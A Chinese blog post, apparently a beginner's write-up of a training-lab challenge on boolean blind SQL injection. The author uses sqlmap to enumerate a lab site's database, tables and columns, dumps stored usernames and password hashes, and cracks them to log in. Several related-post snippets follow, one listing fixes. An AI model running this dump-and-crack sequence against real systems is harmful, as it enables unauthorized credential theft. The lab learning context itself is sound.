SQL注入漏洞测试(布尔盲注)

于 2019-12-09 11:59:37 发布
阅读量147 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dzh444/article/details/103438669
版权

SQL注入漏洞测试(布尔盲注)

原理还不是很懂,处于懵懵懂懂的状态

1.首先开启靶场环境在这里插入图片描述因为之前看过很多博客知道这个是个注入点

打开kali使用sqlmap输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db

开始不知道是什么意思

百度是个好东西 bing一下发现current -db是当前数据库的意思在这里插入图片描述猜测这个就是查询当前数据库的意思

然后就可以看到这个网站的数据库

在这里插入图片描述

名字叫做”stormroup“

之后输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 -D stormgroup --tables

可以看到这个数据库有两个表分别是member和notice在这里插入图片描述然后开始爆破member中的数据

输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 -D stormgroup -T member --columns之后就可以看到它的列表中有name,password,status 3个在这里插入图片描述之后就是要得到name 和 passeword 中的数据

输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 -D stormgroup -T member -C name,password --dump可以获得两个账号和密码在这里插入图片描述百度md5在线解密

在这里插入图片描述
在这里插入图片描述

得到两个结果

一个一个试了以后发现第二个能登陆上最后得到key在这里插入图片描述

?? plus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者靶场 入门:SQL注入漏洞测试布尔
qq_43233085的博客
01-09 642
入门:SQL注入漏洞测试布尔) 启动靶场环境,得到测试地址 http://219.153.49.228:44500/ 访问页面,寻找sql注入点,访问注入页面。 http://219.153.49.228:44500/new_list.php?id=1 使用sql注入工具,如sqlmap或穿山甲,进行布尔。 本次使用穿山甲进行注入。 对密码密文进行MD5解码,得到密码明文,解...
SQL注入漏洞演示源代码
07-02
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理以及如何预防它。 SQL注入是一种利用不安全的...
墨者学院SQL注入漏洞测试(布尔)
痴人说梦梦中人
11-13 448
1、 使用SQLmap,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key 2、 爆库 爆表 爆列 Dump Md5解密: 登陆获取key 3.修复建议 对sql语句进行以下处理: 1、 sql语句预编译 2、 检查变量数据类型和格式 3、 过滤特殊字符 4、 转译特殊符号 ...
墨者 - SQL注入漏洞测试(布尔)
weixin_43803070的博客
07-08 1405
** 一、报数据库名字 ** 1.根据浮动的通告进度条,找到sql注入点。 内容不变,判断是数字型注入。 http://219.153.49.228:44199/new_list.php?id=1 and 1=1 --+ 2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10 http://219.153.49.228:44199/new_list.php?id=1%...
布尔.py_sqlpython_
10-03
布尔(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,...
自己动手编写SQL注入漏洞扫描工具
02-16
SQL注入漏洞扫描工具】是一种用于检测Web应用程序是否存在SQL注入漏洞的工具。SQL注入是网络安全领域中的一个重要问题,攻击者可以通过这种技术输入恶意SQL代码,从而获取、修改、删除数据库中的敏感信息,甚至...
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入思路详解
12-14
3. **布尔(Boolean Based Blind)**:通过改变查询的布尔结果来判断数据的真假。 4. **时间(Time Based Blind)**:通过延迟响应时间来推断条件的真假。 对于每种注入方式,其优先级和应用场景不同,攻击...
SQL注入天书 sqli-labs
01-11
SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码,以获取、修改、删除数据库中的敏感信息,甚至控制整个服务器。本书结合理论与实践,是IT安全领域的重要学习资源。 首先,我们需要了解...
sql注入练习工具
11-08
1. **扫描与探测**:能够自动检测网站是否存在SQL注入漏洞,通过发送不同的SQL语句来测试服务器的响应。 2. **payload生成**:生成各种SQL注入 payload,帮助测试不同类型的注入漏洞,如单引号、双引号、释符等。 ...
网络安全-实验七-SQL注入-+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmap对DVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
安全测试工具:sqlmap,很好用的sql注入测试工具
10-29
sqlmap是一款开源的自动化SQL注入工具,其设计目标是帮助安全测试人员和渗透测试专家快速、高效地检测网站是否存在SQL注入漏洞。这款工具具有以下显著特点: 1. 自动化:sqlmap能够自动识别和利用SQL注入漏洞,无需...
0x00.SQL注入漏洞测试(布尔)
qq_31679787的博客
09-09 183
初始界面; 尝试进行post注入,但是发现不行; 但是发现下方的通知栏会跳转,跳转后的页面存在注入; 爆库名; 爆表名; 先爆member表的列名; 爆库; 通过md5解密得到密码; 登录后得到key; ...
SQL注入漏洞测试布尔
qq_45883601的博客
12-06 294
使用Sqlmap工具注入 1、首先获取数据库名 Python sqlmap.py -u"http://219.153.49.228:49953/new_list.php?id=1" --current-db 2、
burpsuite sql注入漏洞测试(布尔)
最新发布
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔是一种常用的技术之一。布尔是一种攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔漏洞: 1. 配置Burp Suite:首先,确保已正确配置Burp Suite以拦截和修改HTTP请求和响应。您可以在Burp Suite的Proxy选项卡下设置代理,并根据需要配置浏览器或应用程序以使用该代理。 2. 找到注入点:使用Burp Suite的Spider或Repeater工具来找到潜在的注入点。这可以是URL参数、表单字段或Cookie值等。 3. 构造注入语句:使用布尔技术,构造适当的注入语句来测试漏洞。例如,您可以尝试通过在WHERE子句中使用布尔逻辑来判断条件是否为真或假来确定数据库中的信息。 4. 检测响应差异:发送经过注入处理的请求,并观察响应是否有所不同。如果响应正常,可能意味着注入失败;如果响应出现错误或有其他差异,可能意味着注入成功。 5. 使用布尔逻辑验证条件:根据不同的响应,使用布尔逻辑来验证条件是否为真或假。例如,您可以通过在注入语句中使用AND或OR运算符来检查条件。 6. 执行进一步的测试:根据验证的结果,您可以进一步探测和利用漏洞。使用Burp Suite的其他工具和插件来自动化和加快测试过程。 请意,在进行任何安全测试之前,确保您已获得适当的授权,并仅在合法范围内进行测试。此外,始终遵循道德黑客和安全测试的最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值